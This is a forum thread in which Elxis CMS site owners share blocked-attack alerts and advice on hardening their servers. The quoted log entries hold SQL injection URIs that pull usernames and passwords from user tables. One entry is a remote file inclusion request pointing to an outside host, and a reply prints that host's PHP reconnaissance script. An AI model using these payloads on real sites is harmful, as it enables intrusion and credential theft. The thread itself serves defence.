Elxis CMS Forum

Support => Security => Topic started by: nikos65 on October 16, 2008, 23:18:19

Title: Combination of attacks in 3 sites
Post by: nikos65 on October 16, 2008, 23:18:19

1.Site 
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
Requested URI: /index2.php?option=ds-syndicate&version=1&feed_id=1 union select 1,cast(concat(username,0x3a,0x3a,0x3a,password,0x3a,usertype) as binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from nstp_users limit 1,1--
DATE: 16-10-2008 13:48:28
Attack was logged


2.site
 Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 15:02:13
Attack was logged

3.site
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 15:02:15
Attack was logged
Combination of attacks in 3 sites

Thanks elxis  ;D

Title: Re: Combination of attacks in 3 sites
Post by: nikos65 on October 16, 2008, 23:21:11

Just notice that earlier today i have another attack from the same ip in another site ??? ???

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 213.132.76.26 (blocked)
DATE: 16-10-2008 11:49:31
Attack was logged


I ve just check

Whois Record

inetnum:        213.132.76.0 - 213.132.76.255
netname:        KTC-FTTB
descr:          Kubtelecom FTTB network
descr:          Russian Federation

Title: Re: Combination of attacks in 3 sites
Post by: datahell on October 17, 2008, 00:24:36

I also face an increased number of attacks these days. Mostly from china and japan (as usual...)

Title: Re: Combination of attacks in 3 sites
Post by: rentasite on October 17, 2008, 11:09:56

Got some attacks from the same ip (213.132.76.26).  On 4-5 Elxis sites.

I banned the IP from my server also.

Title: Re: Combination of attacks in 3 sites
Post by: nikos65 on October 17, 2008, 11:18:38

Probably the attacker use static ip !!
If i was the attacker i will never use the same ip to attack

Title: Re: Combination of attacks in 3 sites
Post by: datahell on October 17, 2008, 13:22:58

Secure your PHP and your web server, use Elxis security tools and your site would be like a fortress.
You have nothing to worry about for these kind of attacks. They usually use pre-made scripts that scan massively sites for certain joomla components with security holes.

They are amateurs but you must always be careful. A friend's server was hacked lately due to bad server set up. The hacker with a simple pre-made php script that uploaded to a site gained access to 468 web sites on the server (cpanel accounts, databases, ftp accounts, etc)!

Simple but affective server security guide:
Disable the PHP functions that Elxis proposes you to disable in the first step of the installation procedure (exec, system, popen, dl, set_time_limit, ini_set, etc).

Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on December 20, 2008, 15:37:58

I got one here too...

Quote

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 82.197.222.145
Requested URI: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt???
DATE: 19-12-2008 01:05:10
Attack was logged
Site turned offline for 120 seconds

If one type

Code: [Select]

http://www.europeytu.com/.httpaccess/roid.txt then, he can see :

Code: [Select]

<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
As far as I know (very, very little), .httpaccess is a file, not a folder. How can they have ../.httpaccess/roid.txt?
Is it possible that they don't have a file named .httpaccess, but a folder?
And, do you think www.europeytu.com is aware of this? Should I inform them?

My access.log says:

Quote

82.197.222.145 - - [19/Dec/2008:01:05:02 -0600] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt??? HTTP/1.1" 200 208 "-" "libwww-perl/5.79"

Bbclone:

Quote

19 Dec, 09:05:03       Ολλανδία    82.197.222.145   1       libWWW 5.79      libWWW 5.79

I can't also explain the difference in reported time of the attack.
Any ideas?

Title: Re: Combination of attacks in 3 sites
Post by: Ivan Trebješanin on December 20, 2008, 16:47:39

You can add these lines into your .htaccess file:

Code: [Select]

RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]

That would disable libwww agent from accessing your site.

PS
Don't worry, attacks like you quoted are not serious at all.

Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on December 22, 2008, 11:40:47

Ivan, thank you for the quick reply.

But, is it really the agent quilty for the attack?
Or they have just been used?

Title: Re: Combination of attacks in 3 sites
Post by: Ivan Trebješanin on December 22, 2008, 12:40:50

Quote from: jimmyz on December 22, 2008, 11:40:47

But, is it really the agent quilty for the attack?

No, agents don't attack. But, this is very common "hacker's" tool.
Anyway, judging from the URL, this was just a script kiddie's attack. It is not worth of attention.

Title: Re: Combination of attacks in 3 sites
Post by: rentasite on January 14, 2009, 16:42:34

Today i got this:

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 193.111.244.21 (blocked)
Requested URI: /index.php?option=com_user&task=confirmreset
DATE: 14-01-2009 14:55:01
Attack was logged

Title: Re: Combination of attacks in 3 sites
Post by: rentasite on January 26, 2009, 11:34:54

Today

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106 (blocked)
Requested URI: /com_downloads/elxis-templates//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:24:55
Attack was logged

Title: Re: Combination of attacks in 3 sites
Post by: CREATIVE Options on January 26, 2009, 13:27:32

Welcome :)

Code: [Select]

//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

Code: [Select]

/com_downloads//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Of course all have been blocked! thanks Elxis Defender !

Title: Re: Combination of attacks in 3 sites
Post by: ks-net on January 26, 2009, 13:38:27

Elxis become a famous cms.....

IT IS THE FIRST TIME I SEE AN ELXIS COMPOMENT IN URLS AND NOT JOOMLA-MAMBO...

Title: Re: Combination of attacks in 3 sites
Post by: CREATIVE Options on January 26, 2009, 14:03:41

Quote from: ks-net on January 26, 2009, 13:38:27

Elxis become a famous cms.....

IT IS THE FIRST TIME I SEE AN ELXIS COMPOMENT IN URLS AND NOT JOOMLA-MAMBO...

Kosta, I have seen similar attacks before, and ALL the attacks have been blocked successfully.
I run some websites, which have HIGH level of risk and they have been targeted many times. And some of these attacks was specific for the Elxis code.

I have posted in the past guides / instructions to setup the Elxis Defender for HIGH risk websites, you can find it in the forum.

Title: Re: Combination of attacks in 3 sites
Post by: datahell on January 26, 2009, 18:51:30

This is not an attack to Elxis, it is an attack to mambo sites... Notice the url, it says "mos_users", also the func variable does not exist in elxis or in component downloads. You have nothing to be afraid of...

Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on January 28, 2009, 14:17:31

Just for the record, here are the four different types of URIs, in twelve attacks, on the same site.

Code: [Select]

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: //index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:24:55


Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: /index.php?option=com_downloads&Ite ...//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:27:34


Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: /index.php?option=com_downloads&Itemid=145&mylang=english//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:27:41


Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 72.32.68.106
Requested URI: /index.php?option=com_downloads&task=category&cid=2&Itemid=144//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
DATE: 26-01-2009 04:27:42

Should I use the abuse mail of the company that owns this IP?

Title: Re: Combination of attacks in 3 sites
Post by: rentasite on January 28, 2009, 14:19:46

Quote from: jimmyz on January 28, 2009, 14:17:31

Should I use the abuse mail of the company that owns this IP?

If you haven't anything else to do, yes  ;D

Title: Re: Combination of attacks in 3 sites
Post by: jimmyz on January 28, 2009, 14:36:22

Just a thought... :-\

Title: Re: Combination of attacks in 3 sites
Post by: CREATIVE Options on February 02, 2009, 21:27:31

Something new :)

Code: [Select]

Elxis Defender blocked an attack to your site ATTACKER IP ADDRESS: 115.49.70.18 (blocked) Requested URI: /blog/corfu-news/corfu/?page=3 and char(124)+user+char(124)=0
DATE: 02-02-2009 19:55:14

Elxis Defender blocked an attack to your site ATTACKER IP ADDRESS: 115.49.70.18 (blocked) Requested URI: /blog/corfu-news/corfu/?page=3\' and char(124)+user+char(124)=0 and \'%\'=\'
DATE: 02-02-2009 19:55:15
TY Elxis Defender